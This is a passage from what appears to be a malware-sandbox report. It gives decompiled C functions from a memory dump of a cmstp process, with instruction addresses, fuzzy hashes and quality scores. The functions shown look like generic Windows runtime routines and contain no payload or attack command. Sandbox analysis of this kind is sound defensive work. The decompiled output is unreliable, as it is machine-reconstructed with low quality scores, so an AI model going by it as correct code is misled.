					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E0510D268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L050F77F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}

0x051546b7
0x051546ba
0x051546c5
0x051546c8
0x051546d0
0x051546d4
0x051546e6
0x051546e9
0x051546f4
0x051546ff
0x05154705
0x05154706
0x0515470c
0x05154713
0x0515471b
0x05154723
0x05154725
0x051546d6
0x051546d9
0x051546db
0x051546db
0x05154732

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction ID: 2c5daf1d1173f84a8fddf1bff54a9028e27d0e6cbaa8d54484747da09d87fee0
Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction Fuzzy Hash: 7F110272604208BBCB159F6CA8808BEB7B9EF95310F1080AAFD4487351DB718D55C3A5

Uniqueness

Uniqueness Score: -1.00%

Function 05102397 Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E05102397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x51c848c != 0) {
					L050FFAD0(0x51c8610);
					if( *0x51c848c == 0) {
						E050FFA00(0x51c8610, _t19, _t27, 0x51c8610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E05102581(0x51c8610, 0x50b50a0, _t26, _t27, _t28);
						E050FFA00(0x51c8610, 0x50b50a0, _t27, 0x51c8610);
					}
				} else {
					L1:
					_t11 =  *0x51c8614; // 0x1
					if(_t11 == 0) {
						_t11 = E05114886(0x50b1088, 1, 0x51c8614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E05102581(0x51c8610, (_t11 << 4) + 0x50b5070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}

0x051023b0
0x051023b6
0x05102409
0x05102415
0x05145ae9
0x00000000
0x0510241b
0x0510241b
0x0510241d
0x05102427
0x0510242e
0x05102430
0x05102430
0x051023b8
0x051023b8
0x051023b8
0x051023bf
0x051023fc
0x051023fc
0x051023c1
0x051023c3
0x051023d0
0x051023d8
0x051023d8
0x051023dc
0x051023de
0x051023e1
0x051023e1
0x051023ec

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba4dde87dd083e7079837ed3ab5abe549ed4993f97cc47a7e7c91a525a73b4ef
Instruction ID: f430c5237989b29518eb8e6a4c70e892463aa06b2f127771eb9fc1399e51eee0
Opcode Fuzzy Hash: ba4dde87dd083e7079837ed3ab5abe549ed4993f97cc47a7e7c91a525a73b4ef
Instruction Fuzzy Hash: 28116B7130430067E7309629FCC8F59BADABB64710F155066F606EB2C1CBF0E841C754

Uniqueness

Uniqueness Score: -1.00%

Function 051137F5 Relevance: .1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E051137F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E050F2280(_t6, 0x51c8550);
				}
				_t29 = E0511387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E050EFFB0(0x51c8550, _t27, 0x51c8550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L050F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}

0x051137fa
0x051137fc
0x05113805
0x05113808
0x05113808
0x05113814
0x05113818
0x05113846
0x05113848
0x0511384b
0x0511384b
0x05113852
0x00000000
0x05113854
0x05113856
0x00000000
0x00000000
0x05113863
0x00000000
0x05113863
0x0511381a
0x0511381a
0x0511381f
0x0511386e
0x0511386e
0x05113871
0x05113873
0x05113873
0x05113868
0x00000000
0x05113868
0x05113821
0x05113826
0x00000000
0x00000000
0x05113828
0x0511382a
0x05113841
0x00000000
0x05113841

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a16e1e8f2026d00ec789cd9091470dc24b2b3d354407779d78e582e2f17fc5db
Instruction ID: 49ecca3e9cc510ded75e86fb65fbc2dc23efe12134d346f61e772dee0b61589b
Opcode Fuzzy Hash: a16e1e8f2026d00ec789cd9091470dc24b2b3d354407779d78e582e2f17fc5db
Instruction Fuzzy Hash: 32012BB1A016109BC3378B19D940E3ABFA7EF81A5071549FDED298B249CF30C801C7C4

Uniqueness

Uniqueness Score: -1.00%

Function 050DC962 Relevance: .1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E050DC962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t19;
				char _t22;
				intOrPtr _t26;
				intOrPtr _t27;
				char _t32;
				char _t34;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x51cd360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E050EEEF0(0x51c70a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E0515F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E050EEB70(_t29, 0x51c70a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E0511B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E0515F1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x51c70c0; // 0x0
					while(_t38 != 0x51c70c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x51cb1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}

0x050dc96a
0x050dc974
0x050dc988
0x050dc98a
0x05147c9d
0x05147c9f
0x05147ca4
0x05147cae
0x05147cf0
0x05147cf5
0x05147cfa
0x050dc992
0x050dc996
0x050dc997
0x050dc998
0x050dc9a3
0x050dc9a3
0x05147cb0
0x05147cb7
0x05147cbb
0x00000000
0x00000000
0x05147cbd
0x05147ce8
0x05147cc5
0x05147cc8
0x05147cca
0x05147cd0
0x05147cd6
0x05147cde
0x05147ce4
0x05147ce4
0x05147cd0
0x00000000
0x05147ce8
0x050dc990
0x00000000

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a064f27ff48fa6dd5b14578a4ba12ef1ce7398760586980092875b5612d7378
Instruction ID: 0229f3fee1adacc4094ebdd5ba6986dc20aa066f4ded6c3ec95bffa488f6c9d8
Opcode Fuzzy Hash: 8a064f27ff48fa6dd5b14578a4ba12ef1ce7398760586980092875b5612d7378
Instruction Fuzzy Hash: 68110E313106069FC710AE28D88AA6BBBA6FB84220B001A2CF941836D0DF61EC52CFD1

Uniqueness

Uniqueness Score: -1.00%

Function 0510002D Relevance: .1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0510002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E050F7D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E050F7D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E050F7D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E050F7D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}

0x05100032
0x05100037
0x05100043
0x05144b3a
0x05100049
0x05100049
0x05100049
0x0510004e
0x05100053
0x05144b48
0x05144b5a
0x05144b4a
0x05144b53
0x05144b53
0x05144b5f
0x00000000
0x05144b61
0x00000000
0x05144b61
0x05100059
0x05100059
0x05100060
0x05144b6f
0x05144b6f
0x05100069
0x05144b83
0x00000000
0x00000000
0x05144b90
0x05144b9b
0x05144b9b
0x05144ba4
0x00000000
0x00000000
0x05144baa
0x00000000
0x0510006f
0x0510006f
0x00000000
0x0510006f
0x05100069

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
Instruction ID: 9101741ec8840ee593e33495c9e9568815fe793e42b1ed8507869083a44d6e43
Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
Instruction Fuzzy Hash: 5C110831605A818FDB22D724D98CB3637E6FF44794F1E20A0DD0587BD2E7AAC841CB51

Uniqueness

Uniqueness Score: -1.00%

Function 050E766D Relevance: .1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E050E766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E0510F3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E0510F3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L050F4620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}

0x050e7672
0x050e767f
0x050e7689
0x050e76de
0x050e76de
0x050e768b
0x050e7691
0x050e7693
0x050e7697
0x00000000
0x050e7699
0x050e76a8
0x00000000
0x050e76aa
0x050e76ad
0x050e76b1
0x00000000
0x050e76b3
0x050e76b3
0x050e76b5
0x050e76ba
0x050e76bc
0x050e76bc
0x050e76c0
0x00000000
0x050e76c2
0x050e76ce
0x050e76ce
0x050e76c0
0x050e76b1
0x050e76a8
0x050e7697
0x050e76d9

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction ID: bc3158d09a8d910b094d80266de62b57680b091cb8e58fe89cef3120652213fd
Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction Fuzzy Hash: BD018432700159AFC731EE5EEC45E6F77ADEB85664B380524BA09CB294DA70DD01C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 0516C450 Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E0516C450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E05119910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E051195B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E051195D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L050F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E051195D0();
				return L050F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}

0x0516c458
0x0516c45d
0x0516c466
0x0516c468
0x0516c469
0x0516c46a
0x0516c46b
0x0516c46e
0x0516c46f
0x0516c471
0x0516c476
0x0516c476
0x0516c47c
0x0516c47e
0x0516c480
0x0516c480
0x0516c483
0x0516c484
0x0516c486
0x0516c488
0x0516c48f
0x0516c491
0x0516c493
0x0516c493
0x0516c48f
0x0516c498
0x0516c49e
0x0516c4ad
0x0516c4ad
0x0516c4b2
0x0516c4b4
0x0516c4cd

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction ID: 06994c52e724c0182fcc01ddaf9a20a905190b20804dc748dcb8b539d2ffd65e
Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction Fuzzy Hash: 0301DE72240609BFD721AF25CC84EA6F76DFF54394F004136F25552560CB22ACA1CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 050D9080 Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E050D9080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x51c85ec;
				E050F2280(_t48, 0x51c85ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E050EFFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x51c538c; // 0x775768c8
					if( *_t84 != 0x51c5388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x51af6e8);
						E0512D0E8(0x51c85ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E051A88F5(_t80, _t85, 0x51c5388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x51c86c0; // 0x33a07b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x51c86b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E050F2280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E051A88F5(0x51c85ec, _t85, 0x51c5388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E0511AFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x51cb1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x51c84c0;
																			if(_t82 >=  *0x51c84c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E051A9063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E050D922A(_t99);
										_t64 = E050F7D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E051A8B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x51c86c0; // 0x33a07b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x51c86b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x51c86bc;
													_t87 = 0x51c86b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E050D9240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x51c86c4;
												_t87 = 0x51c86c0;
												L27:
												E05109B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E0512D130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x51c5388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x51c538c = _t51;
						goto L6;
					}
				}
			}

0x050d9082
0x050d9083
0x050d9084
0x050d9085
0x050d9087
0x050d9096
0x050d9098
0x050d9098
0x050d909e
0x050d90a8
0x050d90e7
0x050d90e7
0x050d90aa
0x050d90b0
0x050d90b7
0x050d90bd
0x050d90dd
0x050d90e6
0x050d90bf
0x050d90bf
0x050d90c7
0x050d90cf
0x050d90f1
0x050d90f2
0x050d90f4
0x050d90f5
0x050d90f6
0x050d90f7
0x050d90f8
0x050d90f9
0x050d90fa
0x050d90fb
0x050d90fc
0x050d90fd
0x050d90fe
0x050d90ff
0x050d9100
0x050d9102
0x050d9107
0x050d910c
0x050d9110
0x050d9113
0x050d9115
0x050d9136
0x050d913f
0x050d9143
0x051337e4
0x051337e4
0x050d9117
0x050d9117
0x050d911d
0x00000000
0x050d911f
0x050d911f
0x050d9125
0x00000000
0x050d9127
0x050d912d
0x050d9130
0x050d9134
0x050d9158
0x050d915d
0x050d9161
0x050d9168
0x05133715
0x050d916e
0x050d916e
0x050d9175
0x050d9177
0x050d917e
0x050d917f
0x050d9182
0x050d9182
0x050d9187
0x050d9187
0x050d918a
0x050d918d
0x050d918f
0x050d9192
0x050d9195
0x050d9198
0x050d9198
0x050d9198
0x050d919a
0x00000000
0x00000000
0x0513371f
0x05133721
0x05133727
0x0513372f
0x05133733
0x05133735
0x05133738
0x0513373b
0x0513373d
0x05133740
0x00000000
0x05133746
0x05133746
0x05133749
0x00000000
0x0513374f
0x0513374f
0x05133751
0x05133757
0x05133759
0x0513375c
0x0513375c
0x0513375e
0x0513375e
0x05133761
0x05133764
0x00000000
0x00000000
0x05133766
0x05133768
0x051337a3
0x051337a3
0x051337a5
0x051337a7
0x051337ad
0x051337b0
0x051337b2
0x051337bc
0x051337c2
0x051337c2
0x051337b2
0x050d9187
0x050d9187
0x050d918a
0x050d918d
0x050d918f
0x050d9192
0x050d9195
0x00000000
0x050d9195
0x00000000
0x0513376a
0x0513376a
0x0513376a
0x0513376c
0x0513376c
0x0513376f
0x05133775
0x00000000
0x00000000
0x05133777
0x05133779
0x05133782
0x05133787
0x05133789
0x05133790
0x05133790
0x0513378b
0x0513378b
0x0513378b
0x05133792
0x05133795
0x00000000
0x05133795
0x00000000
0x05133779
0x05133798
0x00000000
0x05133798
0x00000000
0x05133768
0x0513379b
0x0513379b
0x05133751
0x05133749
0x00000000
0x05133740
0x050d91a0
0x050d91a3
0x050d91a9
0x050d91b0
0x00000000
0x050d91b0
0x050d9187
0x050d91b4
0x050d91b4
0x050d91bb
0x050d91c0
0x050d91c5
0x050d91c7
0x051337da
0x050d91cd
0x050d91cd
0x050d91cd
0x050d91d2
0x050d91d5
0x050d9239
0x050d9239
0x050d91d7
0x050d91db
0x050d91e1
0x050d91e7
0x050d91fd
0x050d9203
0x050d921e
0x050d9223
0x00000000
0x050d9205
0x050d9205
0x050d9208
0x050d920c
0x050d9214
0x050d9214
0x050d920c
0x050d91e9
0x050d91e9
0x050d91ee
0x050d91f3
0x050d91f3
0x050d91f3
0x050d91e7
0x00000000
0x00000000
0x00000000
0x050d9134
0x050d9125
0x050d911d
0x050d914e
0x050d90d1
0x050d90d1
0x050d90d3
0x050d90d6
0x050d90d8
0x00000000
0x050d90d8
0x050d90cf

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4fe573ef7443dc9329be9251705fda5499e62659895cac982cbc188f18e0d2a
Instruction ID: 1047a38546b192ab97a5b65c5845c15004db7c60f7fe7a533223d14957e325e4
Opcode Fuzzy Hash: a4fe573ef7443dc9329be9251705fda5499e62659895cac982cbc188f18e0d2a
Instruction Fuzzy Hash: C301D1726013009FD3248F04F880B29BFFAFB95320F264466F5019B691C775EC81CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 051A4015 Relevance: .0, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E051A4015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E050F2280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E050F2280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x51c86ac);
					E050DF900(0x51c86d4, _t28);
